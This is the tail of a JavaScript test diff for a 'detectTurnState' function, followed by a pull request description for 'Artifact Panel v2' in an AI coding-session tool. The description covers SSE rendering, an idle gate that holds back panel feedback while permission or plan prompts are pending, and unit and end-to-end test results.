+      line({ type: 'assistant', message: { content: [{ type: 'text', text: 'Finished.' }] } })
+    );
+    assert.equal((await detectTurnState(file)).state, 'idle_at_prompt');
+  });
+
+  it('unknown for a missing/unreadable binding (caller falls back to PTY-quiet)', async function () {
+    assert.equal((await detectTurnState('/no/such/file.jsonl')).state, 'unknown');
   });
 });


### PR DESCRIPTION
## What
Consumer (ai-or-die) side of Artifact Panel v2, implementing the frozen cross-repo contract v2.2. Pairs with the github-router producer-tools PR (`feat/artifact-tools-v2`).

**Reliability (P0):** SSE is the sole agent→human render path (fixes the double render); per-session queue + chat (no loss on tab switch); server-authoritative dismiss + re-open badge; SSE `id`/`Last-Event-ID` replay + `/history` on reconnect; note-composer failure recovery.

**Correctness (P0):** transcript-primary idle gate (`detectTurnState` in `src/control/jsonl-awaiting.js`) — a free-text push is declined whenever a user-facing tool (ExitPlanMode / AskUserQuestion / permission) is pending, so panel feedback can never answer a live menu; structured actions route through `_controlRespond`.

**Interactivity (P1):** typed `/await` (`comment|action|ended`) + `/actions`; SDK `data-aod-*` capture (choose-one + multi-select group/submit); panel action forwarding + plan-state; sandboxed `artifact_update` + tagged-400 INVALID_REQUEST.

## Tests / smoke
91 unit pass; e2e `56-artifact-panel-v2` 3/3 green — happy path (open → comment → Send → drain → reply renders once → dismiss → re-open → history intact), choose-one + single-delivery, multi-select submit. Edge cases as named unit tests: idle-gate decline on a pending ExitPlanMode, `artifact_update` → INVALID_REQUEST, SSE reconnect replay. gemini reviewed (select/radio double-emit fixed).

## Notes
- Implements frozen contract v2.2 (`docs/architecture/artifact-panel-v2-contract.md`). Security = mesh/transport boundary, no custom capability token (view-ticket dropped in v2.2).
